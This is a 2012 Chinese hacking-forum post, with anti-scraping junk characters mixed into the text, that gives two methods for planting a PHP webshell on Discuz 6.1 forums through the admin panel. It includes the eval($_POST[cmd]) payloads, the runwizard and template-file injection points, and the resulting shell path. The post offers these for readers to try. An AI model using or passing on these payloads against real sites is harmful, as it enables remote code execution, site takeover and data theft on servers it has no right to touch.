找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2239|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell( Q: p, P/ S! `; H
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
" a5 k( [- o/ ]( }5 D  {. s" l1:# U: [6 v/ D/ c; o9 ?* i4 `
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
- }4 ]$ {  L5 S! _admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell& B: V: \3 C2 f/ \
<?php eval($_POST[cmd]);?>) ]3 Z0 Q6 S4 r7 F1 R9 Z9 h
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php- G6 r5 r( @' _( F" R+ Y- s' b

. A9 D/ Y  J& R8 y2 Q, K3 p* ~( J5 A
" Y+ N# ?$ B2 ^" H3 ]1 z% V5 v2:后台模板管理--默认模板套系--详情
2 T, O0 Y$ d- q6 s0 gtemplates/default/actions.lang.php( Q9 u, L8 Z3 r5 b- y8 c2 h! t4 K" ?
jhackj\\');eval($_POST[cmd])?>;//6 @1 ~1 L2 G2 G7 B. u

: h. a: @$ s; |* _+ f利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表